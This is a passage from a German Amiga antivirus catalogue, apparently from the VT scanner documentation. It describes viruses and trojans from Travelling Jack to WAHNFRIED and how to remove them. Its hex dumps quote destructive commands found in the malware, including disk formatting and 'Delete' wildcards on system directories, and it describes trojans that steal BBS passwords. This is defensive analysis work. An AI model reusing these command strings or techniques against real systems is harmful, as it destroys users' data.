ROM), nicht resetfest a) schreibt ein File auf Disk VIRUS.xy Laenge immer 198 Bytes x u. y sind HexZahlen, die ueber $BFE801 bestimmt werden. Text in VIRUS.xy: The Traveling Jack.... I'm traveling from town to town looking for respect, and all the girls I could lay down make me go erect. -Jack, 21st of September 1990 b) linkt sich an andere Prg.e Bedingungen: DOS0-Disk, Disk validated, 12 Bloecke frei auf Disk, Filelaenge mind. 2000 Bytes, FileName mind. 5 Zeichen, FileName enthaelt kein Zeichen kleiner als $40, kein Info.File Typ A: LinkHunkLaengenBerechnung: $24C + Wert aus $DFF006 decodiert im Speicher $909+1 Bytes Typ B: LinkHunkLaengenBerechnung: $25B + Wert aus $DFF006 decodiert im Speicher $945+1 Bytes - Travelling Jack 3 gibt es nicht, es handelt sich um Typ B, glauben Sie mir. Einige andere VirenChecker machen einen Fehler, indem sie die Hunklaengenaenderung nicht beachten und erkennen deshalb nur EINEN Typ B, obwohl mehrere moeglich sind. (Stand 28.09.91) - Trick-Gag Empfehlung Loeschen anderer moeglicher Name: Shocked-Gag bekannter Archivname: Trick.zip Laenge: 84606 Bytes Im Archiv ist zu lesen: 00000000 0000000f 04250000 00537973 .........%...Sys 3a53686f 636b6564 2e696666 504b0102 :Shocked.iffPK.. ;... 00000000 0f0464a2 00005379 733a5762 ......d...Sys:Wb 53746172 7475702f 54726963 6b504b01 Startup/TrickPK. ;... 00000000 000f0470 a3000053 79733a50 .......p...Sys:P 5053504b 01021401 14000000 0800c4b5 PSPK............ ;... 5379733a 57625374 61727475 702f5472 Sys:WbStartup/Tr 69636b2e 696e666f 504b0506 ick.infoPK.. Beim Entpacken wird kopiert nach: Sys: Shocked.iff 57694 Bytes PPS 66088 Bytes WbStartup: Trick 328 Bytes Trick.info 3619 Bytes Das Trick-Programm wird beim naechsten Reset aufgerufen. Im Programm ist zu lesen: 42804e75 5379733a 50505320 5379733a B.NuSys:PPS Sys: 53686f63 6b65642e 69666600 Shocked.iff. Mit DOS-Execute wir Sys:PPS Sys:Shocked.iff ausgefuehrt, also ein Bild angezeigt. Sie sehen dann in grossen Buchstaben Shocked. Mit der Esc-Taste koennen Sie weitermachen. Loeschen Sie einfach diese vier Files. Weitere Schaeden sind nicht bekannt. - TRIPLEX-Virus BB Cool, DoIo auch KS2.04 belegt im Speicher $800 Bytes, ist 2x im Speicher Vermehrung und Schaeden: BB VirusPrg. meldet sich NICHT im BB ist zu lesen: This nice little Virus was written in 1990 usw. - TRISECTOR 911 Virus BB immer $7F000 KS2.04 : nein fordert trackdisk.device NICHT KickTag, KickChecksum nach 1. Reset auch: DoIo, Vermehrung und Schaeden: BB und $94(a6) fuer Zeitbestimmung - TRISTAR-Viruskiller V1.0 Es ist NICHT der Original TRISTAR- BB gemeint, sondern jemand hat den Text in einen Target-BB (sehr kurzer Code) eingesetzt. Oh, ihr Anfaenger !! VT erkennt Target s.o. - Trojan BB anderer Name: Incognito s.o. - TROJAN 3.0 File Laenge ungepackt: 10536 Bytes Einbruchsprogramm gegen BBS, also fuer Normaluser ohne Mailbox ungefaehrlich. Empfehlung: einfach loeschen Versucht durch Cli-Ausgabe zu taeuschen: TROJAN KILLER V3.0 (23/8/92) Please enter the full path U have to your download dir < eg. BBS:warez/upload > The directory?: Checking for known trojans on harddisk... Report: 0 trojan(s) found' Checking for known trojans in memory...! Trojan(s) found on harddisk : 0! Trojan(s) found in memory : 0 Please contact ->NYLONMAN<- for new trojan killers!!! Note: This program only works on AmiExpress 1.xx and 2.xx Press <<ENTER>> in Wirklichkeit: liest aus: BBS:user.data legt ab in: /demo99.lha liest aus: BBS:user.keys legt ab in: /demo98.lha Es handelt sich natuerlich NICHT um lha-Files. Die Files werden in dem Unterverzeichnis abgelegt, das Sie oben nach ?: eingegeben haben. Loeschen Sie bitte diese zwei "lha"-Files von Hand. Trojan-File-Erkennung mit VT getestet: 20.10.92 - TRUSTNOONE-Trojan Zerstoerung anderer moeglicher Name: visions-Trojan Filenamen: Visions.020 Laenge: 130048 Bytes Visions.030 Laenge: 132396 Bytes Entpackt ist im File zu lesen: 733a7379 7374656d 2f666f72 6d617420 s:system/format 64726976 65206466 303a206e 616d6520 drive df0: name 54525553 542d4e4f 4f4e4500 646f732e TRUST-NOONE.dos. oder: fffffffe 7379733a 73797374 656d2f66 ....sys:system/f 6f726d61 74206472 69766520 7379733a ormat drive sys: 206e616d 65205452 5553542d 4e4f4f4e name TRUST-NOON 45207175 69636b00 646f732e 6c696272 E quick.dos.libr Soll also df0: oder sys: formatieren. Da einmal mit quick formatiert wird, sollten Sie DiskSalve zur Rettung ver- suchen. - TTS-Virus BB siehe oben bei BadBytes1-Virus - TURK_V1.3 Cool, DoIo, im Speicher immer $7f000 schreibt TURK nach $60 Vermehrung: ueber BB Textausgabe (entschluesselt mit subq #6,d0) ueber DisplayAlert: Amiga Failure... Cause: TURK VIRUS Version 1.3! im BB sichtbar: TURK - TWINZ SANTA CLAUS Coder-Clone s.o. Text geaendert im BB: THE SANTA CLAUS VIRUS !!!! usw. - U.K.LamerStyle anderer Name: Clist-Virus s.o. - U.K.Lame Style anderer Name: Clist-Virus s.o. - UA62-ACP-Trojan siehe auch bei CLP-Trojan, PHA Trojan Gefunden in Archiv ua62.lha Laenge: 28761 Bytes ZerstoerungsFile: Mit 3E8-Hunk und gepackt: Laenge 26868 Bytes Entpackt: Laenge 51956 Bytes Schadensteil ausgebaut : Laenge 45616 Bytes Keine verbogenen Vektoren. Keine Vermehrung Namensbegruendung: siehe Auszug Schaden: Schreibt in alle Files in S: egal ob Data oder Prg. einen Text. Ed-startup vorher: 73692030 20203120 2250726f 6a656374 si 0 1 "Project 220a7369 20312020 3220224f 70656e2e ".si 1 2 "Open. 2e2e2020 20204553 436f7022 20226f70 .. ESCop" "op 203f202f 46696c65 3a202f22 0a736920 ? /File: /".si 32202034 0a736920 33202032 20225361 2 4.si 3 2 "Sa Ed-startup nachher: 64522e57 486f206f 4620414c 46202841 dR.WHo oF ALF (A 4c69454e 204c6946 4520466f 524d2920 LiEN LiFE FoRM) 57695348 45532055 2041204d 45525259 WiSHES U A MERRY 20582d4d 41532165 3a202f22 0a736920 X-MAS!e: /".si 32202034 0a736920 33202032 20225361 2 4.si 3 2 "Sa Manchmal wurden die Files auch mit dem Text versehen und der Rest mit Speichermuell gefuellt. Dies war abhaengig vom Prozessortyp. Ed-startup nachher 2: 64522e57 486f206f 4620414c 46202841 dR.WHo oF ALF (A 4c69454e 204c6946 4520466f 524d2920 LiEN LiFE FoRM) 57695348 45532055 2041204d 45525259 WiSHES U A MERRY 20582d4d 4153214b 200b0200 00fc2640 X-MAS!K .....&@ 221b0c41 03ec6650 48416138 2409524b "..A..fPHAa8$.RK Die Files werden unbrauchbar und VT bietet loeschen an. Die Wirkungsweise ist also aehnlich wie bei CLP-Trojan. Fileerkennung: VT erkennt 3E8-Hunk und bietet Ausbau an. Nach dem Ausbau erkennt VT Powerpacker. Bitte entpacken Sie das File mit Powerpacker. Sie stellen dann fest, dass es sich um einen 4EB9-4EF9-Link handelt. VT erkennt jetzt beim Filetest UA62-ACP-Trojan und bietet Ausbau an (hoffe ich). Das entstehende File hat etwas mit BBS zu tun. Mehr kann ich dazu nicht sagen, da ich das Mailbox-Prg. nicht habe. Ich bekomme dann die Meldung: acp.info nicht gefunden oder tooltype NODES fehlen usw. . Sind Sie mit dem Prg. vorsichtig. Es koennte noch ein Trojan im Prg. sein ! - UF-Virus anderer Name: UltraFox s.u. - Uhr-BB Virus Cool DoIo $6c Speicherlage: abhaengig vom Inhalt $4e(a6) minus $800 Fordert trackdisk.device NICHT KS2.04: Nein, da Routine Speicher schon verseucht $6c+1 auf kleiner $FC testet. BB wird decodiert mit eor.b d0,d2 usw. Namensbegruendung: Da kein Text gefunden wurde, wurde ein Schadensfall (s.u.) fuer den Namen herangezogen. Vermehrung: BB - Test ob BB schon verseucht - Neue Codierung mit eor.b d2,d1 (Dx zu Decodierung anders). Der Startwert von d2 wird mit $BFE801 festgelegt. Schaeden: Enthaelt mehrere Zaehlzellen. Eine Zaehlzelle wird auf 0-6 getestet. z.B. Wert 2 addq.b #3,D80002 (Namensbegruendung!!!) Addiere 3 Sekunden. Diese Speicherstelle stimmt aber nach meinem Wissensstand nur fuer den A2000A . Fuer den A2000B waere die richtige Speicherstelle $DC0000 . z.B. Wert 3 erhoehe VHPOSR um $300 z.B. Wert 4 Wartezaehlschleife mit $B000 z.B. Wert 5 Mauspos -$605 usw. - ULDV8 kein Fastmem, KickTag, KickCheckSum, BeginIo, IntVec 5 im BB sichtbar: ULDV8 fordert trackdisk.device Vermehrung:BB - ULog V1.8 siehe bei Devil_11_B.Door - ULOG.X BBS-Bomb siehe oben bei scan.x - UltraFox Cool, im Prg. DoIo, FastMem ja, kennzeichnet eigenen Speicher NICHT als belegt fordert trackdisk.device nicht Vermehrung: ueber BB im Speicher immer ab $7eb00 Zaehlzelle groesser $f = Textausgabe, Graphikroutine Hintergrund dunkelblau, Balken hellblau, Schrift gelb. Greetings from ULTRAFOX of Aust. - Umyj Dupe nur KS1.2, da absoluter DoIo-ROM-Einsprung KickTag, KickCheckSum, DoIo, immer ab $7F800 Fordert trackdisk.device nicht !!! Schaeden und Vermehrung: Bootblock Schreibt in Block 880 (ist nur bei DD-Disk der RootBlock) Umyj Dupe usw. DisplayAlert: Umyj Dupe usw. - Unkown-Virus BB Stand: 23.08.94 Einige AntiVirusPrge erkennen einen Unkown-Virus. ( (1) oder (2) ) Das stimmt NICHT. VT erkennt Noboot (seit 02.11.90 !!!!) Lesen Sie bitte nach bei VT-andere.BB unter Noboot. Danke Vielleicht aendern die anderen AntiVirusProgrammee die Meldung beim naechsten Update. - UNLZX-Trojan siehe bei GoTcHa-Trojan - UnpackJPEG-Trojan Zerstoerung Verbogene Vektoren: keine Nicht Resetfest Filename: UnpackJPEG 27856 Bytes VT bietet nur Loeschen an Am Ende des Files ist zu lesen: 33393230 62000000 002d433a 52756e20 3920b....-C:Run 3e4e494c 3a20433a 44656c65 7465203e >NIL: C:Delete > 4e494c3a 20424253 3a4d4158 73424253 NIL: BBS:MAXsBBS 2e436f6e 66696700 00000014 4465636f .Config.....Deco 64696e67 20746f20 5359533a 542e2e20 ding to SYS:T.. 0000001f 433a5275 6e203e4e 494c3a20 ....C:Run >NIL: 433a4465 6c657465 203e4e49 4c3a2053 C:Delete >NIL: S 3a233f00 0000001f 433a5275 6e203e4e :#?.....C:Run >N 494c3a20 433a4465 6c657465 203e4e49 IL: C:Delete >NI 4c3a2043 3a233f00 00000023 4a504547 L: C:#?....#JPEG 20486561 64657220 666f756e 64206f6e Header found on 2066696c 65206043 4a532e4a 50472700 file `CJS.JPG'. 00000026 433a5275 6e203e4e 494c3a20 ...&C:Run >NIL: 433a4465 6c657465 203e4e49 4c3a2042 C:Delete >NIL: B 42533a54 6578742f 233f0000 00184578 BS:Text/#?....Ex 65637574 696e6720 4a504547 20766965 ecuting JPEG vie 7765722e 2e2e0000 0022433a 52756e20 wer......"C:Run 3e4e494c 3a20433a 44656c65 7465203e >NIL: C:Delete > 4e494c3a 204c4942 533a233f 00000003 NIL: LIBS:#?.... - USSR492-Virus BB Excrement-Clone (Texte geaendert) anderer Name: Sentinel siehe oben Es wird auch der Name USSR 492 verwendet, da aber auf "Sent" im Virus selbst getestet wird, halte ich den Namen Sentinel fuer sinnvoller, zumal dieser Name auch an gleicher Stelle wie EXCREMENT im Original steht. - V1 BB siehe oben bei EXECUTORS.BB - VC-MakeKey-Trojan siehe bei WiREFACE-Trojan - VCCofTNT-Virus BB Graphikausgabe: VCC of TNT ACCESS FORBIDDEN Schreibt VCC9 nach #34(a6) Fordert trackdisk.device NICHT auch KS2.04 Schaeden: Schreibt sofort unsinnige Werte aus dem Speicher in den BB und den Root-Block Ergebnis: Not a Dos Disk Empfehlung: sofort loeschen Wird auch als AutoBootingBootProtector V2.0 weitergegeben. Typ 2: Eine technische Meisterleistung. Bravo VCC9 wurde durch $k.. ersetzt. Orig Umbau 56434339 002220fc VCC9." . 246bbfd0 002220fc $k..." . ^^^^^^^^ ^^^^^^^^ Die dos.lib wurde an eine andere dafuer aber UNGERADE Stelle im BB verschoben. Das mag der 68000 besonders gerne. 00324e75 646f732e .2Nudos. 010f0777 00ef0f00 ...w.... ^^ gerade ff8f03df fc7dffcf ........ 4c4c2164 6f732e6c LL!dos.l ^^ ungerade - VERA File s.u. bei AntiVirusPrg Ist KEIN Virus !!!! Das Teil macht NICHTS (!!!!) OHNE Rueck- frage. - Vermin Cool, im Prg DoIo immer ab $7eb10 fuellt nicht benoetigten Platz im BB mit Inhalt von $DFF006 auf. Vermehrung und Schaden: Bootblock - Viewtek22-Installer File Laenge ungepackt: 93844 Bytes (so liegt er im lha-Archiv) Namensbegruendung: Wird als Viewtek22.lha weitergegeben. keine verbogenen Vektoren Es wurden 2 Hunks an das Original-Viewtek2.1-Prg (Laenge 88944 Bytes) angelinkt. Die Programmteile sind teilweise mehrfach codiert. VT versucht beide Hunks auszubauen. 1.Hunk: Es duerfte sich um ein Programmteil handeln, das Ver- aenderungen an einer Mailbox vornimmt. FastCall ???? vgl. auch LHAV3-BBS-Trojan s.o. Verlaengert ein File um #864 Bytes Keine verbogenen Vektoren Keine Vermehrungsroutine Wird von VT mit 2.Hunk ausgebaut. Auszug aus dem 1.Hunk (ist uncodiert zu lesen): 533a4861 75707450 66616400 55736572 S:HauptPfad.User 2f537973 4f702f55 73657244 6174656e /SysOp/UserDaten 00426f78 44617465 6e2f426f 78506172 .BoxDaten/BoxPar 616d6574 65720055 7365722f 4b6f7761 ameter.User/Kowa 6c736b79 2f2e494e 44455800 55736572 lsky/.INDEX.User 2f4b6f77 616c736b 792f2e54 58540041 /Kowalsky/.TXT.A 6273656e 64657220 203a204b 46557365 bsender : KFUse 72436865 636b0a42 65747265 66662020 rCheck.Betreff 2.Hunk: Das Virusteil Startet ein Task-Programm s.u. Versucht sich an andere Programme zu linken s.u. Hinweis eines Anwenders zum 1.Hunk (Juli 95): Danke 1. Auslesen des Hauptpfades 2. Auslesen des SysopPsw. 3. Auslesen des Dospsw. 4. Schreiben der Psw. an den User Kowalsky (KFUserCheck ist ein Tool der Programmiertruppe "Krypton Force") - Viewtek22-Virus KEINE verbogenen Vektoren Startet ein Task-Programm s.u. Versucht sich als 1.Hunk vor andere Programme zu linken. Typ A: Verlaengerung der Programme um 4036 Bytes. Typ B: Verlaengerung der Programme um 4504 Bytes. Sonst keine Schaeden festgestellt. Das Teil hat bei mir NIE eine Meldung ausgegeben. Betroffene Programme (alle im C-Verz.) : Fileauszug decodiert: 0063 3a7a6f6f 00633a73 .c:zoo.c:s 6872696e 6b00633a 69707265 66730063 hrink.c:iprefs.c 3a6d6f75 6e740063 3a646d73 00633a73 :mount.c:dms.c:s 65747061 74636800 633a7665 7273696f etpatch.c:versio 6e00633a 6c686172 6300633a 61726300 n.c:lharc.c:arc. 633a6661 73746769 6600633a 76740063 c:fastgif.c:vt.c 3a73686f 7700633a 70707368 6f770063 :show.c:ppshow.c 3a656400 633a6963 6f6e7800 :ed.c:iconx. Eine Doppelverseuchung soll vermieden werden. Auszug aus der Routine: eor.l d1,d0 eor.l d2,d0 bne.s .... Diese Routine verhindert (nicht geplant) aber auch die Erstverseuchung von einigen Files (wurde zufaellig ent- deckt beim Versuch mit arc). Einige arc-Versionen wur- den nicht verseucht. Ablauf: Die Filenamensliste (s.o.) wird durchlaufen. Mindestens 9 Blocks frei Medium ist validated File ist ausfuehrbar ($3f3) Filegroesse max. #143360 Bytes Das Protection-LW wird gerettet (NEU!!!) Das Virusteil wird als 1.Hunk angelinkt. Die folgenden Hunks werden nachgebessert. Da das Teil nicht viele Hunktypen kennt, muss damit gerechnet werden, dass nicht alle verseuchten Files in ALLEN Funktionen arbeits- faehig sind. VT versucht beim Ausbau den Originalzustand wieder herzustellen. File wird zurueckgeschrieben. Gerettetes Protection-LW wird zurueckgeschrieben. (NEU !!!) Falls mind. KS 37, dann wird das Ursprungs-File-Datum mit setfiledate zurueckgeschrieben. (NEU !!!!) Sie koennen also bei der schnellen Durchsicht des C-Ver- zeichnisses ein verseuchtes File nur noch an der Laenge er- kennen und nicht mehr am Datum oder den Protection-Flags. - Viewtek22-Task Name: trackdisk.device s.u. Wenn Sie also nur ein Disk-LW haben und dennoch zweimal trackdisk.device in der taskliste finden, dann sollten Sie vorsichtig werden. VT versucht das Teil abzuschalten. Sie muessen aber mit einem GURU rechnen. Das Teil selbst aendert sich von Process in Task. move.b #$1,$8(a0) Grund: unbekannt Nach einem dosdelay (#500), wird jeweils die TaskReady- und TaskWait-Liste durchsucht. Untersucht wird dabei immer $58(a0) = tc_UserData Ich kenne jetzt EIN Programm, das diesen Zeiger verwendet. Das Viewtek22-Task-Teil schreibt in tc_UserData einen Wert, um sich selbst zu erkennen. Damit wird verhindert, dass bei einem neuen Aufruf des Viewtek22-Virus-Teils neben der Ver- mehrung noch ein trackdisk.device installiert wird. Sonst habe ich KEIN Programm gefunden, das diesen Zeiger verwendet. Ich bitte Sie also um Mithilfe. Sollte tc_UserData leer sein oder das eigene LW enthalten, dann wird in der Taskliste weitergesucht. Der Zeiger in tc_UserData zeigt auf einen Speicherbereich. Dieser Bereich wird nun weiter getestet: cmp.l #$60064ef9,(a1) bne ... cmp.w #$4ef9,$8(a1) bne ... move.l $a(a1),d2 sub.l $4(a1),d2 cmp.l #$1e8,d2 bne ... Bitte, wer kennt solche Programme. Ich lerne gern etwas dazu. Meine Vermutung geht in Richtung Mailbox-Prg oder Utility ?? Um Ihnen die Suche zu erleichtern, habe ich noch einige Task- teile decodiert (Nicht alle). Vielleicht helfen Ihnen die Texte weiter. Mir sagen sie nichts. Ich vermute, dass in ein Mailbox-Prg eingegriffen werden soll ??? decodierte Taskteile: 3151415a 32575358 1QAZ2WSX 33454443 3452460a 3151415a 32575358 3EDC4RF.1QAZ2WSX 33454443 3435360a 3EDC456. ;..... 3151 415a3257 1QAZ2W 53583345 44433452 460a3151 415a0a53 SX3EDC4RF.1QAZ.S 59535445 4d454245 4e450a45 4449540a YSTEMEBENE.EDIT. decodierter Taskname im Virusteil: 62726172 79007472 61636b64 69736b2e brary.trackdisk. 64657669 636500 device. - VIPHS-Virus BB BeginIo, Kicktag, KickCheckSum, Vec5, im Prg $6c KS2.04: nein Versucht zu taeuschen im BB durch: ANTIVIRUS 1989 by VIPHS Verwendet den ByteBandit-Code um $20 verschoben und $6c Auswirkungen s.o. bei ByteBandit - VirConSet-Virus BB (VirusConstructionSet) immer ab $7F000, Cool $7F0BE, DoIo $7F0D2 Fordert trackdisk.device NICHT Schaeden und Vermehrung: in Abhaengigkeit von der Zaehlzelle (5) wird - ein Virus-BB geschrieben oder - mit DisplayAlert ein Text ausgegeben. Schwachpunkt: Intuition- Base wird immer im $C00000-Bereich abgelegt. Die schlimmste Sache: Der BB wird mit dem Programm Virusconstructionset erzeugt. Laenge gepackt (PP): 10192 Bytes Sie werden aufgefordert, einen max 60 Zeichen langen Display- Alert-Text einzugeben. Den erzeugten BB koennen Sie dann auf Disk in DF0: abspeichern. Weiterhin ist noch ein codierter (addi.b #$27,(a0)+) Text im BB vorhanden, der NIE erreicht wird: 5468 69732056 This V 69727573 20776173 206d6164 65207769 irus was made wi 74682053 7461724c 69676874 60732056 th StarLight`s V 69727573 436f6e73 74727563 74696f6e irusConstruction 73536574 2120636f 64656420 6279204d sSet! coded by M 41580000 AX.. - VirConSet2-Virus BB Cool und nach Reset DoIo KS1.3 : ja Fordert trackdisk.device NICHT Schaeden und Vermehrung: Typ A: BB uncodiert Typ B: BB codiert mit eori.b d0,(a0)+ (immer gleich) Test auf Cool schon verbogen Speicherbedarf mit AllocMem Vermehrung mit DoIo falls lesend auf Block 880 (ist nur bei DD-Disk Rootblock) zugegriffen wird. Falls die Zaehlzelle $7FFF0 den Wert 5 erreicht hat, wird mit DisplayAlert ein Text (mit VirusConstructionSet 2 fest- gelegt) ausgegeben. Weiterhin ist noch ein codierter (eori.l #$aaabacad,(a0)+) Text im BB vorhanden, der NIE erreicht wird: 2054 68697320 This 56495255 53207761 73206372 65617465 VIRUS was create 64207769 74682074 68652056 49525553 d with the VIRUS 20434f4e 53545255 4354494f 4e205345 CONSTRUCTION SE 54204949 2020414c 4c20436f 64652062 T II ALL Code b 79204d61 78206f66 20537461 724c6967 y Max of StarLig 68742032 322f342f 31393933 21212100 ht 22/4/1993!!!. Erzeuger: VirusConstructionSet 2 - VIRI-Virus BB s.o. bei F.I.C.A-VIRI-Clone Nur Text geaendert - VIRUS FIGHTER V1.0 BB auch mit KS2.04 VKill-Clone s.u. Prg-Code = VKill DecodierLW geaendert: "1991" (nuetzt bei VT NICHTS!! ) decodierter Text fuer Requester anders: VIRUS FIGHTER V1.0 usw. - VirusHunter (L) File Empfehlung: loeschen Laenge gepackt: 2888 Bytes Laenge ungepackt: 4528 Bytes Im File ist ungepackt zu lesen: 001b0a0d 57656c63 6f6d6520 746f2048 ....Welcome to H 61726477 6172652d 56697275 732d4875 ardware-Virus-Hu 6e746572 0a0d5665 7273696f 6e203130 nter..Version 10 2e323020 6f6e2032 312e3037 2e393220 .20 on 21.07.92 ;..... 0a0d4368 65636b69 6e672052 6f6d2d56 ..Checking Rom-V 656b746f 7273202e 2e2e2052 6f6d2069 ektors ... Rom i 7320696e 66656374 65642121 210a0d53 s infected!!!..S ;usw. Hinweis: Im gepackten Zustand koennte es zu Fehlerkennungen kommen. Soll ein Gag-Programm sein. Neulinge im Amigabereich duerften darueber eine andere Meinung haben. Fundort z.B.: CD-Aminet5:AMINET/GAME/GAG/VIRUSHUNTER.LZH - VIRUS PREDATOR BB: anderer und eigentlich falscher Name: Julie s.o. - VIRUS TERMINATOR V6.0 trojanisches Pferd Mega1-Cr: 1880 Bytes auch KS2.04 Versucht durch Text zu taeuschen: VIRUS TERMINATOR V6.0 by Rudolf Neiber (1992) usw. Installiert in Wirklichkeit im Speicher CHEATER HIJACKER Virus-BB Wird von VT im Speicher als CHEATER HIJACKER erkannt. Sollte von VT im FileTest als VIRUS TERMINATOR 6 erkannt wer- den. Empfehlung: sofort loeschen - Virus V1 immer ab $7EC00 Cool $7ec62, DoIo $7eca8 Arbeitet auch mit KS2.04 ! Fordert trackdisk.device NICHT !!! Schaeden und Vermehrung: ueber Bootblock sobald die Zaehlzelle den Wert $F erreicht hat: Textausgabe mit Graphics-Routinen dunkler Hintergrund Virus V1 (rot) Wir sind wieder da ahaaa.. (gruen) Der letzte Text ist auch im BB zu lesen - Virusblaster V2.3 ungepackt 9232 Bytes keine Vermehrung, keine Vektoren verbogen, (also von der Definition her KEIN Virus, aber auf Zerstoerung ausgelegt) zerstoert Disk in Df0 meldet sich im Cli als AntiVirenProgramm von M&T 7/91 einfach loeschen Herkunft: Virusblaster.LZH 27944 Bytes - Doc-File (geaendertes VT2.26doc-File) - Virusblaster PP 7292 Bytes - virustest anderer Name: TimeBomber s.o. - VirusZ1.02 File Laenge ungepackt: 1148 Clone siehe oben bei CompuPhagozyte 2 Hinweis: a) Die Versionsnummer gibt es am 27.12.93 noch gar nicht. b) Die Laenge muss das Prg. sofort verraten. - visions-Trojan Zerstoerung siehe bei: TRUSTNOONE-Trojan - VKill 1.0 anderer Name: Aids, veraendert PutMsg mit FastMem: (loescht j e d e n nicht schreibgeschuetzten Bootblock o h n e Warnung !!!, auch wenn es ein Orig. Bootblock ist !! ) mit nur ChipMem: (schreibt ohne Warnung eigenen Bootblock) EntschluesselungsLW: " KEN" - VMK3.0-Trojan File Laenge: 2620 Bytes Sofort loeschen Keine verbogenen Vektoren Keine Vermehrung Versucht durch Cli-Text zu taeuschen. Im File ist zu lesen: 009b3333 6d566972 75734d65 6d4b696c ..33mVirusMemKil 6c205633 2e303020 a9204368 72697320 l V3.00 . Chris 48616d65 739b6d00 0a436f6c 64436170 Hames.m..ColdCap ;..... 00736373 692e6465 76696365 00000b0f .scsi.device.... Schadensablauf: Es wird versucht scsi.device Unit 0 zu oeffnen. (d.h. gvpscsi.device u.a. sind NICHT betroffen) a) Falls nein Vektorausgabe in Cli b) Falls ja: Block 0 der Festplatte wird eingelesen. Die BlockChecksum wird um 1 erhoeht und das Byte an Stelle $2b um 1 vermindert. Diese Stelle liegt in einem reservierten Bereich (6 Langworte mit je FFFFFFFF). Sollte das Byte $2b noch nicht 0 sein, so wird nur der Block zurueckgeschrieben. (siehe Testauszug unten). Da die Stelle $2b im Moment keine Bedeutung fuer den Hostadapter hat, faellt dem User nichts auf. ABER !!!! Sobald die Stelle $2b den Wert 0 erreicht, wird der Rigid- bereich auf einer Laenge von $19000 = #102400 Bytes ueber- schrieben. Folge: nach dem naechsten Reset bootet ihre Fest- platte nicht mehr. Abhilfe: Da Sie vorsichtig sind, haben Sie natuerlich von dem Rigid-Bereich mit VT ein Backup gezogen, das Sie jetzt zurueck- spielen koennen. Da erwartet wird, dass Sie VMK in die startup-sequence ueber- nehmen (laut Doc), haben Sie 255 Resets frei, bevor das Un- glueck beginnt. Testauszuege mit VT: Rigid-HD-BB-Orig: 0000: 5244534b 00000040 334d4847 00000007 RDSK...@3MHG.... ^^ 0010: 00000200 00000012 ffffffff 00000001 ................ 0020: 00000003 ffffffff ffffffff ffffffff ................ ^^ Rigid-HD-BB nach 1.Aufruf: 0000: 5244534b 00000040 334d4848 00000007 RDSK...@3MHH.... ^^ 0010: 00000200 00000012 ffffffff 00000001 ................ 0020: 00000003 ffffffff fffffffe ffffffff ................ ^^ Rigid-HD-BB nach 2.Aufruf: 0000: 5244534b 00000040 334d4849 00000007 RDSK...@3MHI.... ^^ 0010: 00000200 00000012 ffffffff 00000001 ................ 0020: 00000003 ffffffff fffffffd ffffffff ................ ^^ usw. ..... Hinweis 97-06-29: Es ist ein neues File aufgetaucht. Filename: patch Filelaenge: 2620 Bytes nach FileID: AMIRC 1.53 BETA PATCH Es wurden einige Bytes veraendert. Folge: Das Teil zerstoert jetzt SOFORT !!!!!! - VoxelSvind-Trojan Zerstoerung Filename: Voxel_Svind.exe Filelaenge: 179860 Bytes Kein verbogener Vektor Nach File-ID: .our.new.demo. VOXEL SVIND! Am Ende des Files ist zu lesen: 2e6c6962 72617279 00000000 00047379 .library......sy 733a0000 00012f00 00000005 6c696273 s:..../.....libs 3a000000 00012f00 00000002 6c3a0000 :...../.....l:.. 00012f00 00000002 633a0000 00012f00 ../.....c:..../. 00000002 733a0000 00012f00 00000001 ....s:..../..... Ablauf: (Entsprechende Graphikeinstellung vorausgesetzt) Dunkler Hinter- grund, sehr grosse blaue Buchstaben "DEPTH", darunter kleiner mit hellen Buchstaben loading... Zerstoerungsergebnis: Directory "Trashcan" yv{huykviglg 736 rmfy{zxgwdnmhlf 384 wgi{fyiwqyqn 696 ezmuqcpejzohs{xzogdiyrswofufc 380 kovjlxrcplq 340 dhnd{tc{mesmmc{onneqosi 1848 vuspovrqwot 17100 hjvzxdfnqcyejouxnmkjsx 4964 unimurzgmmvisqfgttgjctppodook 5688 jlwhtgzpsihgqrzsxhjrvfmcecrcr 18012 oiluciiyyki 39000 Directory "libs" xh{rpqlwkph 2788 pnfluhvycwqjsdvjklcu 1876 Directory "l" xltiv{senfdsynsjelmkeenxo 876 nodxykzogxpvnjcolqpnds 1756 mgevumvxuexdoio 992 wgsjkhzjjvepihxlywql 2804 rcvkhmlzn{dcnygupoqkyst 3412 rceiwppeiellllyckrjkz 3112 ome{wkfd{xycrjmxeu 6464 sxyls{eelkioxwd 7 Directory "s" qy{vuzxtkduulejryw{qjql 1364 Directory "c" is empty Es werden also die Filenamen geaendert. Weiterhin werden Files zwischen den Subdirs verschoben. Beispiele: Trashcan war vor dem Test leer und c: enthielt mehrere Files. Oder: Das File in l: mit der Laenge 7 ist in Wirklichkeit die startup-sequence und war in s: . Die Files werden also aus bestimmten Subdirs (s.o.) geholt und teilweise in beliebigen Subdirs (bei mir z.B. Trashcan und/oder devs) abgelegt. Ich sehe da keine Reparaturmoeglichkeit, die in einem "vernuenftigen" Zeitaufwand durchfuehrbar ist. VT bietet fuer VoxelSvind-Trojan Loeschen an. - VScan-BBS-Trojan File Loeschen Filename: vscan KEINE Vermehrung KEINE verbogenen Vektoren Laenge: 37896 Bytes Fundort z.B.: CD-SAAR2:ARCHIVE/200_299/SAAR_203.LHA Mit der 4EB9-Methode wurde vor VScan ein Teil gelinkt, das BBS manipulieren soll. Trojanteil gepackt: 5344 Bytes Trojanteil entpackt: 8140 Bytes Im entpackten Trojanteil ist zu lesen: 42425300 BBS. 44483000 44483100 44483000 44483100 DH0.DH1.DH0.DH1. 4242533a 00444830 3a424253 2f004448 BBS:.DH0:BBS/.DH 313a4242 532f0044 48303a00 4448313a 1:BBS/.DH0:.DH1: ;...... 803c6600 fdc04e5d 4e752573 436f6e66 .<f...N]Nu%sConf 69672564 00720025 734d7367 42617365 ig%d.r.%sMsgBase 2f486561 64657266 696c6500 61005000 /Headerfile.a.P. 25737573 65722e64 61746100 72002573 %suser.data.r.%s 4d736742 6173652f 31006100 43752073 MsgBase/1.a.Cu s Es koennte sich um eine DEVIL-Variante (siehe oben) handeln. VT bietet nur loeschen an, da der VScan-Programmierer selbst in spaeteren Docs schreibt: 5.05: *** WARNING *** This is a bogus version not made by myself! Avoid this one at all costs! - VT-Faster Virus File CompuPhagozyte 4 - Clone s.o. So ein Programm habe ich nie geschrieben. - WAFT BB Cool, DoIo auch mit KS2.04 Vermehrung Teile des BB`s codiert mit eori.b #-$31,(a0)+ ergibt u.a. Text: W A F T usw Vermehrung u. Schaeden: - BB - DisplayAlert - sucht Screen- u. Windowstruktur - WAHNFRIED BB Cool immer $7F0D8 PutMsg immer $7F0DE KS 2.06: ja fordert 